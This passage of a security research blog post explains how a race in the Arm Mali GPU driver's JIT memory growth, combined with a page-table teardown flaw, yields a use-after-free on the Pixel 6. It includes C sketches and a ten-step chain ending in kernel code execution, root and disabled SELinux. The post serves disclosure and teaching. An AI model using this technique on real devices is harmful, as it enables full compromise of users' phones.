    if (reg->flags & KBASE_REG_ACTIVE_JIT_ALLOC)
        goto out_unlock;
    ...
    /* can't grow regions which are ephemeral */
    if (reg->flags & KBASE_REG_DONT_NEED)
        goto out_unlock;

The KBASE_REG_ACTIVE_JIT_ALLOC flag indicates that a JIT region is actively being used, and it is added when the JIT region is allocated:

struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
        const struct base_jit_alloc_info *info,
        bool ignore_pressure_limit)
{
    ...
    if (info->usage_id != 0)
        /* First scan for an allocation with the same usage ID */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
    if (!reg)
        /* No allocation with the same usage ID, or usage IDs not in
         * use. Search for an allocation we can reuse.
         */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, true);
    ...
    } else {
        ...
        reg = kbase_mem_alloc(kctx, info->va_pages, info->commit_pages, info->extension,
                      &flags, &gpu_addr, mmu_sync_info);
        ...
    }
    ...
    reg->flags |= KBASE_REG_ACTIVE_JIT_ALLOC;
    ...
    return reg;
}

It is removed when kbase_jit_free is called on the region:

void kbase_jit_free(struct kbase_context *kctx, struct kbase_va_region *reg)
{
    ...
    kbase_gpu_vm_lock(kctx);
    reg->flags |= KBASE_REG_DONT_NEED;
    reg->flags &= ~KBASE_REG_ACTIVE_JIT_ALLOC;
    ...
    kbase_gpu_vm_unlock(kctx);
    ...
}

However, at this point, the KBASE_REG_DONT_NEED flag is added to the JIT region. It seems that, during the lifetime of a JIT region, either the KBASE_REG_ACTIVE_JIT_ALLOC or the KBASE_REG_DONT_NEED flag is set on the region, so the use of JIT regions in kbase_mem_commit is already covered entirely?

Well, not entirely: one small window still holds out against these flags. And lifetime management is not easy for JIT regions in the fortified camps of Midgard, Bifrost, and Valhall.

As explained in the section “The life cycle of JIT memory” of my previous post, after a JIT region is freed by submitting the BASE_JD_REQ_SOFT_JIT_FREE GPU job, it’s added to the jit_pool_head list. JIT regions that are in the jit_pool_head list are not yet destroyed and can be reused as JIT regions if another BASE_JD_REQ_SOFT_JIT_ALLOC job is submitted. When kbase_jit_allocate is called to allocate a JIT region, it’ll first look in the jit_pool_head for an unused region:

struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
        const struct base_jit_alloc_info *info,
        bool ignore_pressure_limit)
{
    ...
    if (info->usage_id != 0)
        /* First scan for an allocation with the same usage ID */
        reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
    ...
    if (reg) {
        ...
        ret = kbase_jit_grow(kctx, info, reg, prealloc_sas,
                     mmu_sync_info);
        ...
    }
    ...
}

If a region is found in the jit_pool_head, kbase_jit_grow is called on the region to change its backing store to a suitable size. At this point, the region reg still has the KBASE_REG_DONT_NEED flag attached and is still on the evict_list. However, kbase_jit_grow will first remove reg from the evict_list and remove the KBASE_REG_DONT_NEED flag by calling kbase_mem_evictable_unmake:

static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas,
              enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
    /* Make the physical backing no longer reclaimable */
    if (!kbase_mem_evictable_unmake(reg->gpu_alloc))      //<---- removes KBASE_REG_DONT_NEED
        goto update_failed;
    ...

After this point, the region has neither the KBASE_REG_DONT_NEED nor the KBASE_REG_ACTIVE_JIT_ALLOC flag. It is still protected by the kctx->reg_lock, which prevents the kbase_mem_commit function from changing it. If the region needs to grow, it’ll try to take pages from a memory pool managed by the kbase_context kctx, and if the memory pool does not have the capacity, then it’ll try to grow the memory pool, during which the kctx->reg_lock is dropped:

static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas,
              enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
    while (kbase_mem_pool_size(pool) < pages_required) {
      int pool_delta = pages_required - kbase_mem_pool_size(pool);
      int ret;
      kbase_mem_pool_unlock(pool);
      spin_unlock(&kctx->mem_partials_lock);
      kbase_gpu_vm_unlock(kctx);                   
      ret = kbase_mem_pool_grow(pool, pool_delta);  //<------- race window 
      kbase_gpu_vm_lock(kctx);
      ...
   }
}

Between the kbase_gpu_vm_unlock and kbase_gpu_vm_lock (marked as race window in the above), it is possible for kbase_mem_commit to modify the backing pages of reg. As kbase_mem_pool_grow involves rather large memory allocations from the kernel page allocator, this race window can be hit fairly easily.
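
The shape of this race can be sketched in user space. The following toy model (all names are hypothetical stand-ins, not driver code) uses semaphores to deterministically force a “commit” into the window where the grow path has dropped its lock, reproducing the stale old_size and delta:

```c
#include <pthread.h>
#include <semaphore.h>
#include <stddef.h>

#define COMMIT_PAGES 512

/* Toy stand-in for kbase_mem_phy_alloc: just the backing-page count. */
static size_t nents = 64;
static size_t mapped_from, mapped_to;   /* range handed to the GPU mapper */

static sem_t window_open, window_closed;

/* Models kbase_jit_grow: snapshot old_size/delta, drop the lock (the
 * semaphores stand in for kbase_gpu_vm_unlock/lock around
 * kbase_mem_pool_grow), then use the stale snapshots. */
static void *grow_thread(void *arg)
{
    (void)arg;
    size_t old_size = nents;                 /* snapshot */
    size_t delta = COMMIT_PAGES - nents;     /* snapshot */

    sem_post(&window_open);                  /* "vm_unlock": window opens */
    sem_wait(&window_closed);                /* "vm_lock": window closes */

    nents += delta;                          /* pages appended at stale nents */
    mapped_from = old_size;                  /* GPU mapping grown with stale size */
    mapped_to = COMMIT_PAGES;
    return NULL;
}

/* Models KBASE_IOCTL_MEM_COMMIT shrinking the region to zero in the window. */
static void *commit_thread(void *arg)
{
    (void)arg;
    sem_wait(&window_open);
    nents = 0;                               /* shrink backing store */
    sem_post(&window_closed);
    return NULL;
}

static void run_race(void)
{
    pthread_t g, c;
    sem_init(&window_open, 0, 0);
    sem_init(&window_closed, 0, 0);
    pthread_create(&g, NULL, grow_thread, NULL);
    pthread_create(&c, NULL, commit_thread, NULL);
    pthread_join(g, NULL);
    pthread_join(c, NULL);
}
```

After run_race, the backing store holds 448 pages at indices [0, 448), but the GPU mapping covers pages [64, 512): the mismatch described below.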

The next question is, what can I do with this race?

To answer this, we need to take a look at how backing pages are stored in a kbase_va_region and what is involved in changing the size of the backing stores. The structure responsible for managing backing stores in a kbase_va_region is the kbase_mem_phy_alloc, stored as the gpu_alloc and cpu_alloc fields. In our settings, these two are the same. Within the kbase_mem_phy_alloc, the fields nents and pages are responsible for keeping track of the backing pages:

struct kbase_mem_phy_alloc {
    ...
    size_t                nents;
    struct tagged_addr    *pages;
    ...
}

The field nents is the number of backing pages for the region, while pages is an array containing addresses of the actual backing pages. When the size of the backing store changes, entries are either added to or removed from pages. When an entry is removed from pages, a NULL address is written to the entry. The size nents is also changed to reflect the new size of the backing store.

In general, growing the backing store involves the following:

  1. Allocate memory pages and then add them to the pages array of the gpu_alloc, and then change gpu_alloc->nents to reflect the new size.
  2. Insert the addresses of the new pages into the GPU page table to create GPU mappings so the pages can be accessed via the GPU. Shrinking the backing store is similar, but pages and mappings are removed instead of added.

We can now go back to take a look at the kbase_jit_grow function. Prior to growing the memory pool, it stores the number of pages that reg needs to grow by as delta, and the original size of reg as old_size.

static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas)
{
    ...
    /* Grow the backing */
    old_size = reg->gpu_alloc->nents;

    /* Allocate some more pages */
    delta = info->commit_pages - reg->gpu_alloc->nents;
    ...
    //grow memory pool
    ...

Recall that, while growing the memory pool, it is possible for another thread to modify the backing store of reg, which will change reg->gpu_alloc->nents and invalidates both old_size and delta. After growing the memory pool, both old_size and delta are used for allocating backing pages and creating GPU mappings:

static int kbase_jit_grow(struct kbase_context *kctx,
              const struct base_jit_alloc_info *info,
              struct kbase_va_region *reg,
              struct kbase_sub_alloc **prealloc_sas)
{
    ...
    //grow memory pool
    ...
    //delta use for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);
    ...
    //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,
            old_size);

The function kbase_alloc_phy_pages_helper_locked allocates delta pages and appends them to the reg->gpu_alloc->pages array. In other words, delta pages are added to the entries between reg->gpu_alloc->pages + nents and reg->gpu_alloc->pages + nents + delta:

The function kbase_mem_grow_gpu_mapping, on the other hand, maps the pages between reg->gpu_alloc->pages + old_size and reg->gpu_alloc->pages + info->commit_pages to the gpu addresses between region_start_address + old_size * 0x1000 and region_start_address + info->commit_pages * 0x1000, where region_start_address is the GPU address at the start of the region:

Now, what if reg->gpu_alloc->nents changed after old_size and delta are stored? For example, if I shrink the backing store of reg so that the new nents is smaller than old_size, then kbase_alloc_phy_pages_helper_locked will add delta pages to reg->gpu_alloc->pages, starting from reg->gpu_alloc->pages + nents:

After that, kbase_mem_grow_gpu_mapping will insert GPU mappings between region_start_address + old_size * 0x1000 and region_start_address + info->commit_pages * 0x1000, and back them with pages between reg->gpu_alloc->pages + old_size and reg->gpu_alloc->pages + info->commit_pages, independent of what nents is:

This creates gaps in reg->gpu_alloc->pages where the backing pages are not mapped to the GPU (indicated by “No mapping” in the figure) and gaps where addresses are mapped to the GPU but there are no backing pages (indicated by “No backing”). Either way, it’s not obvious how to exploit such a situation. In the “No mapping” case, the addresses are invalid and accessing them from the GPU simply results in a fault. In the “No backing” case, the addresses are valid but the backing memory has zero as its physical address, so accessing these addresses from the GPU is most likely going to result in a crash.
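
To make the two kinds of gaps concrete, they can be computed directly from the quantities involved. A minimal sketch (hypothetical helper names), assuming the region is shrunk to `shrunk` pages during the race window, delta = commit - old_size pages are then appended starting at index `shrunk`, and the GPU mapping is grown over [old_size, commit):

```c
#include <stddef.h>

struct range { size_t start, end; };  /* page indices, end exclusive */

/* Backed but not GPU-mapped ("No mapping" in the figure): pages appended
 * at the stale offset that the mapping growth never covers. */
static struct range gap_no_mapping(size_t shrunk, size_t old_size)
{
    struct range r = { shrunk, old_size };
    return r;
}

/* GPU-mapped but with no backing page ("No backing" in the figure):
 * mapped addresses past the end of the appended pages. */
static struct range gap_no_backing(size_t shrunk, size_t old_size, size_t commit)
{
    size_t delta = commit - old_size;
    struct range r = { shrunk + delta, commit };
    return r;
}
```

For example, shrinking a 64-page region to zero while it grows toward 512 pages leaves pages [0, 64) backed but unmapped and addresses [448, 512) mapped but unbacked.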

A curious optimization

While auditing the Arm Mali driver code, I’ve noticed an interesting optimization in the kbase_mmu_teardown_pages function. This function is called to remove GPU mappings before releasing their backing pages. It is used every time a memory region is released or when its backing store shrinks.

This function essentially walks through a GPU address range and marks their page table entries as invalid, so the address can no longer be accessed from the GPU. What is curious about it is that, if it encounters a high level page table entry that is already marked as invalid, then it’ll skip a number of GPU addresses that belong to this entry:

int kbase_mmu_teardown_pages(struct kbase_device *kbdev,
    struct kbase_mmu_table *mmut, u64 vpfn, size_t nr, int as_nr)
{
        ...
        for (level = MIDGARD_MMU_TOPLEVEL;
                level <= MIDGARD_MMU_BOTTOMLEVEL; level++) {
            ...
            if (mmu_mode->ate_is_valid(page[index], level))
                break; /* keep the mapping */
            else if (!mmu_mode->pte_is_valid(page[index], level)) {
                /* nothing here, advance */
                switch (level) {
                ...
                case MIDGARD_MMU_LEVEL(2):
                    count = 512;            //<------ 1.
                    break;
                ...
                }
                if (count > nr)
                    count = nr;
                goto next;
            }
        ...
next:
        kunmap(phys_to_page(pgd));
        vpfn += count;
        nr -= count;

For example, if the level 2 page table entry is invalid, then mmu_mode->pte_is_valid in the above will return false, and path 1. is taken, which sets count to 512, which is the number of pages contained in a level 2 page table entry. After that, the code jumps to next, which simply advances the address by 512 pages and skips cleaning up the lower-level page table entries for those addresses. If the GPU address where this happens aligns with the size of the entry (512 pages in this case), then there is indeed no need to clean up the level 3 page table entries, as they can only be reached if the level 2 entry is valid.

If, however, the address where pte_is_valid is false does not align with the size of the entry, then the clean up of some page table entries may be skipped incorrectly.

In the above figure, the yellow entry in the level 2 PGD is invalid, while the orange entry right after it is valid. When kbase_mmu_teardown_pages is called with the address 0x7448100000, which has a 256-page offset from the start of the yellow entry, pte_is_valid will return false because the yellow entry is invalid. This then causes the clean up of the addresses between 0x7448100000 and 0x7448300000 (which is 0x7448100000 + 512 pages) to be skipped. For the addresses between 0x7448100000 and 0x7448200000, indicated by the green block, this is correct, as the addresses are under the yellow entry and cannot be reached. The addresses between 0x7448200000 and 0x7448300000, indicated by the red block, however, are under the orange entry, which is valid, so skipping their clean up is incorrect: they can still be reached from the GPU.

As it turns out, in all use cases of kbase_mmu_teardown_pages, a valid start address vpfn is passed, which ensures that whenever pte_is_valid evaluates to false, the corresponding GPU address is always aligned and the clean up is correct.
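
The arithmetic behind this alignment argument is easy to check. Assuming 4KB pages and 512 entries per page table level (so a level 2 entry spans 512 pages, i.e. 2MB), a sketch (hypothetical helper names) of the skip count the teardown should use for an invalid level 2 entry versus what the code actually computes:

```c
#include <stdint.h>

#define PAGE_SHIFT   12
#define LEVEL2_PAGES 512ULL   /* pages covered by one level 2 entry (2MB) */

/* Page frame number of a GPU virtual address. */
static uint64_t vpfn_of(uint64_t gpu_va) { return gpu_va >> PAGE_SHIFT; }

/* Pages from vpfn to the end of its level 2 entry: what an aligned-aware
 * teardown would skip when the entry is invalid. */
static uint64_t correct_skip(uint64_t vpfn)
{
    return LEVEL2_PAGES - (vpfn % LEVEL2_PAGES);
}

/* What the code actually does: skip a full 512 pages regardless of the
 * offset inside the entry. */
static uint64_t actual_skip(uint64_t vpfn)
{
    (void)vpfn;
    return LEVEL2_PAGES;
}
```

For the worked example, vpfn of 0x7448100000 sits 256 pages into its level 2 entry, so a correct skip is 256 pages, yet the code skips 512, overshooting 256 pages into the next (valid) entry and ending at 0x7448300000.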

Exploiting the bug

This, however, changes with the bug that we have here.

Recall that, by changing the size of the JIT region while kbase_jit_grow is running, it is possible to create memory regions that have a “gap” in their gpu mapping where some GPU addresses that belong to the region are not mapped. In particular, if I shrink the region completely while kbase_jit_grow is running, I can create a region where the start of the region is unmapped:

When this region is freed, its start address is passed to kbase_mmu_teardown_pages to remove its GPU mappings. If I then take care that:

  1. The start of this region is not aligned with the boundary of the level 2 page table entry that contains it;
  2. The previous addresses within this level 2 page table entry are also unmapped;
  3. The “gap” of unmapped addresses in this region is large enough that the rest of the addresses in this level 2 page table entry are also unmapped.

Then, the level 2 page table entry (the yellow entry) containing the start address of the region will become invalid, and when kbase_mmu_teardown_pages is called and pte_is_valid is evaluated at the start of the region, it’ll return false for the yellow entry:

The cleanup in kbase_mmu_teardown_pages then skips the GPU addresses in the orange entry, meaning that the GPU mapping for the addresses in the green block will remain even after the region and its backing pages are freed. This allows the GPU to retain access to memory pages that are already freed.

In the case of a JIT memory region, the only way to free the region is to first place it in the evict_list by submitting the BASE_JD_REQ_SOFT_JIT_FREE GPU job, and then create memory pressure, for example, by mapping a large amount of memory via mmap, to cause the Linux shrinker to run and free the JIT region in the evict_list. After the corrupted JIT region is freed, some of its GPU addresses will retain access to its backing pages, which are now freed and can be reused for other purposes. I can then use the GPU to gain access to these pages when they are reused. So, the two remaining problems are:

  1. The amount of memory pressure required to trigger the Linux shrinker is uncertain, and after allocating a certain amount of memory, there is no guarantee that the shrinker will be triggered. I’d like to find a way to test whether the JIT memory has been freed after each allocation so that I can reuse its backing pages more reliably.
  2. Reuse the backing pages of the JIT memory in a way that will allow me to gain root.

For the first problem, the situation is very similar to CVE-2022-38181, where the use-after-free bug was triggered through memory eviction, so I can apply the solution from there. The Arm Mali driver provides an ioctl, KBASE_IOCTL_MEM_QUERY that allows users to check whether a memory region containing a GPU address is valid or not. If the JIT region is evicted, then querying its start address with KBASE_IOCTL_MEM_QUERY will return an error. So, by using the KBASE_IOCTL_MEM_QUERY ioctl every time after I mmap some memory, I can check whether the JIT region has been evicted or not, and only try to reclaim its backing pages after it has been evicted.
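
A sketch of this probing loop, with the driver interaction abstracted behind callbacks since the actual mmap and KBASE_IOCTL_MEM_QUERY calls are device-specific; the `sim_` functions below are purely illustrative stand-ins, not driver code:

```c
#include <stddef.h>

/* apply_pressure() would mmap more memory; region_alive() would issue
 * KBASE_IOCTL_MEM_QUERY on the JIT region's start address and report
 * whether it still succeeds. Both are supplied by the caller; nothing
 * here talks to the real driver. */
static int wait_for_eviction(int (*apply_pressure)(void *),
                             int (*region_alive)(void *),
                             void *ctx, int max_steps)
{
    for (int step = 1; step <= max_steps; step++) {
        if (apply_pressure(ctx))
            return -1;                 /* mmap failed: give up */
        if (!region_alive(ctx))
            return step;               /* MEM_QUERY failed: region evicted */
    }
    return 0;                          /* never evicted within budget */
}

/* --- toy simulation: the region is "evicted" after enough pressure --- */
static int pressure_applied;
static int sim_pressure(void *ctx) { (void)ctx; pressure_applied++; return 0; }
static int sim_alive(void *ctx)    { (void)ctx; return pressure_applied < 3; }
```

The loop stops at the first allocation after which the query fails, which is exactly when reclaiming the backing pages should begin.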

For the second problem, we need to look at how the backing pages of a memory region are freed. The function kbase_free_phy_pages_helper is responsible for freeing the backing pages of a memory region:

int kbase_free_phy_pages_helper(
    struct kbase_mem_phy_alloc *alloc,
    size_t nr_pages_to_free)
{
    ...
    bool reclaimed = (alloc->evicted != 0);
    ...
    while (nr_pages_to_free) {
        if (is_huge_head(*start_free)) {
          ...
        } else {
            ...
            kbase_mem_pool_free_pages(
                &kctx->mem_pools.small[alloc->group_id],
                local_end_free - start_free,
                start_free,
                syncback,
                reclaimed);
            freed += local_end_free - start_free;
            start_free += local_end_free - start_free;
        }
    }
    ...
}

The function calls kbase_mem_pool_free_pages to free the backing pages and, depending on the reclaimed argument, either returns the pages to memory pools managed by the Arm Mali driver or directly back to the kernel’s page allocator. In our case, reclaimed is set to true because alloc->evicted is nonzero due to the region being evicted. This means the backing pages will go directly back to the kernel’s page allocator:

void kbase_mem_pool_free_pages(struct kbase_mem_pool *pool, size_t nr_pages,
        struct tagged_addr *pages, bool dirty, bool reclaimed)
{
    ...
    if (!reclaimed) {          //<------ branch not taken as reclaim is true
        /* Add to this pool */
        ...
    }
    /* Free any remaining pages to kernel */
    for (; i < nr_pages; i++) {
        ...
        p = as_page(pages[i]);
        kbase_mem_pool_free_page(pool, p);   //<---- returns page to kernel
        pages[i] = as_tagged(0);
    }
    ...
}

This means that the freed backing page can now be reused as any kernel page, which gives me plenty of options to exploit this bug. One possibility is to use my previous technique to replace the backing page with page table global directories (PGD) of our GPU kbase_context.

To recap, let’s take a look at how the backing pages of a kbase_va_region are allocated. When allocating pages for the backing store of a kbase_va_region, the kbase_mem_pool_alloc_pages function is used:

int kbase_mem_pool_alloc_pages(struct kbase_mem_pool *pool, size_t nr_4k_pages,
        struct tagged_addr *pages, bool partial_allowed)
{
    ...
    /* Get pages from this pool */
    while (nr_from_pool--) {
        p = kbase_mem_pool_remove_locked(pool);     //<------- 1.
        ...
    }
    ...
    if (i != nr_4k_pages && pool->next_pool) {
        /* Allocate via next pool */
        err = kbase_mem_pool_alloc_pages(pool->next_pool,      //<----- 2.
                nr_4k_pages - i, pages + i, partial_allowed);
        ...
    } else {
        /* Get any remaining pages from kernel */
        while (i != nr_4k_pages) {
            p = kbase_mem_alloc_page(pool);     //<------- 3.
            ...
        }
        ...
    }
    ...
}

The input argument kbase_mem_pool is a memory pool managed by the kbase_context object associated with the driver file that is used to allocate the GPU memory. As the comments suggest, the allocation is actually done in tiers. First, the pages will be allocated from the current kbase_mem_pool using kbase_mem_pool_remove_locked (1 in the above). If there is not enough capacity in the current kbase_mem_pool to meet the request, then pool->next_pool is used to allocate the pages (2 in the above). If even pool->next_pool does not have the capacity, then kbase_mem_alloc_page is used to allocate pages directly from the kernel via the buddy allocator (the page allocator in the kernel).

When freeing a page, provided that the memory region is not evicted, the same happens in reverse order: kbase_mem_pool_free_pages first tries to return the pages to the kbase_mem_pool of the current kbase_context, if the memory pool is full, it’ll try to return the remaining pages to pool->next_pool. If the next pool is also full, then the remaining pages are returned to the kernel by freeing them via the buddy allocator.
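
This tiered free path can be modeled with a toy counter-based simulation (names hypothetical; this is not the driver’s data structure), including the reclaimed case where the pools are bypassed entirely:

```c
#include <stddef.h>

/* Toy model of the tiered pools: a per-context pool, the device-wide
 * next_pool behind it, and the kernel page allocator behind both.
 * Only page counts are tracked. */
struct pool {
    size_t cur, max;          /* pages currently held / capacity */
    struct pool *next_pool;
};

static size_t freed_to_kernel;

/* Mirrors the free order: fill this pool, spill to next_pool, and
 * return whatever remains to the kernel. For an evicted (reclaimed)
 * region, everything goes straight back to the kernel. */
static void pool_free_pages(struct pool *pool, size_t n, int reclaimed)
{
    if (!reclaimed) {
        while (pool && n) {
            size_t room = pool->max - pool->cur;
            size_t take = n < room ? n : room;
            pool->cur += take;
            n -= take;
            pool = pool->next_pool;
        }
    }
    freed_to_kernel += n;
}
```

For instance, freeing 5 pages into a context pool with 1 slot of room backed by a device pool with 2 slots of room sends 2 pages back to the kernel; with reclaimed set, all 5 bypass the pools.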

As noted in my post “Corrupting memory without memory corruption,” pool->next_pool is a memory pool managed by the Mali driver and shared by all the kbase_context. It is also used for allocating page table global directories (PGD) used by GPU contexts. In particular, this means that by carefully arranging the memory pools, it is possible to cause a freed backing page in a kbase_va_region to be reused as a PGD of a GPU context. (The details of how to achieve this can be found here.)

After triggering the vulnerability, I retain access to a freed backing page of a JIT region, and I’d like to reclaim this page as a PGD of a GPU context. In order to do so, I first need to reuse it as a backing page of another GPU memory region. However, as the freed backing page of the JIT region has now been returned to the kernel, I can only reuse it as a backing page of another region if both the memory pool of the kbase_context and the shared memory pool of the Mali driver (pool->next_pool) are emptied. This can be achieved simply by creating a sufficient number of memory regions on the GPU. When the memory pools run out of capacity, some of these regions will take their backing pages from the kernel allocator, so by creating enough of them, the freed backing page of our JIT region may be reused as a backing page of one of these newly created regions.

To identify which of these new memory regions had reclaimed our backing page, recall that the freed JIT region page is still reachable from the GPU via a GPU address associated with the freed JIT region. I can instruct the GPU to write some recognizable “magic values” to this address, and then search for these “magic values” in the newly created memory regions to identify the one that has reclaimed the backing page.

After identifying the region, I can manipulate the memory pool of its GPU context so that it becomes full; then, when I free this region, its backing page will be returned to pool->next_pool, the shared memory pool managed by the Mali driver. This allows the page to be reused as a PGD of a GPU context. By writing to the GPU address in the freed JIT region, I can then modify this PGD. As the bottom-level PGD stores the physical addresses of the pages backing GPU virtual addresses, writing to the PGD enables me to map arbitrary physical pages into GPU memory, which I can then access by issuing GPU commands. This gives me access to arbitrary physical memory. As the physical addresses of kernel code and static data are not randomized and depend only on the kernel image, I can use this primitive to overwrite kernel code and gain arbitrary kernel code execution.
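
A sketch of the bottom-level page table arithmetic this relies on, where ENTRY_FLAGS is a placeholder for the driver’s real access-flag bits (those live in the driver’s MMU backend and are not reproduced here):

```c
#include <stdint.h>

#define PAGE_MASK   0xfffULL
#define ENTRY_FLAGS 0x1ULL    /* placeholder for the real ATE flag bits */

/* Forge a bottom-level entry pointing at an arbitrary physical page. */
static uint64_t make_entry(uint64_t phys)
{
    return (phys & ~PAGE_MASK) | ENTRY_FLAGS;
}

/* Which of the 512 slots of a bottom-level PGD a GPU VA lands in. */
static unsigned pgd_index(uint64_t gpu_va)
{
    return (gpu_va >> 12) & 0x1ff;
}

/* Physical page address stored in an entry. */
static uint64_t phys_of_entry(uint64_t entry)
{
    return entry & ~PAGE_MASK;
}
```

Writing make_entry(target_phys) into slot pgd_index(va) of a controlled PGD page is what makes the physical page readable and writable from GPU address va.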

To summarize, the exploit involves the following steps:

  1. Allocate a JIT memory region, and then free it so that it gets placed on the jit_pool_head list.
  2. Allocate another JIT memory region and request a large backing store; this will reuse the freed region placed in the jit_pool_head in the previous step. Provided the requested size is large enough, the Mali driver will try to grow the memory pools to fulfill the request.
  3. From a different thread, use the KBASE_IOCTL_MEM_COMMIT ioctl to shrink the backing store of the JIT memory region allocated in step 2 to zero. If this happens while the Mali driver is growing the memory pool, the JIT memory region becomes corrupted, with the GPU addresses at the start of the region left unmapped. As growing the memory pool involves many slow, large allocations, this race can be won easily.
  4. Free the JIT region to place it on the evict_list.
  5. Increase memory pressure by mapping memory to user space via normal mmap system calls.
  6. Use the KBASE_IOCTL_MEM_QUERY ioctl to check if the JIT memory is freed. Carry on applying memory pressure until the JIT region is freed.
  7. Allocate new GPU memory regions to reclaim the backing pages of the freed JIT memory region.
  8. Identify the GPU memory region that has reclaimed the backing pages.
  9. Free the GPU memory region identified in step 8. and then reuse its backing pages as PGD of a GPU context (using the technique described in my previous blog post).
  10. Rewrite the page table entries so that some GPU addresses point to kernel code. This allows me to rewrite kernel code from the GPU to gain arbitrary kernel code execution, which can then be used to rewrite the credentials of our process to gain root, and to disable SELinux.

The exploit for Pixel 6 can be found here with some setup notes.

Conclusion

In this post I looked at a small change made in version r40p0 of the Arm Mali driver that was somehow missed out when other security patches were applied to the Pixel 6.

Software vendors often separate security related patches from other updates so that their customers can apply a minimal set of security patches while avoiding backward incompatible changes. This creates an interesting situation where the general public, and in particular, attackers and security researchers, only see the entire set of changes, rather than the security-related changes that are going to be backported and used by many users.

For an attacker, whether or not a change is labeled as security-related makes very little difference to what they do. However, for a security researcher who is trying to help, this may stop them from reporting a mislabeled security issue and cause a delay in the patch being applied. In this particular case, although I noticed the change, I never thought to investigate it too closely or to report it, as I assumed it would be applied. This resulted in a considerable delay between the bug being identified and it being patched and, in the end, left Android users vulnerable to an N-day vulnerability for several months. Making the backporting process more transparent and identifying security patches in public releases could perhaps have prevented such a delay and reduced the amount of time during which this bug was exploitable as an N-day.

Notes


  1. Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the beginning of the very first book in the Asterix series, “Asterix the Gaul.” 

The post Pwning Pixel 6 with a leftover patch appeared first on The GitHub Blog.
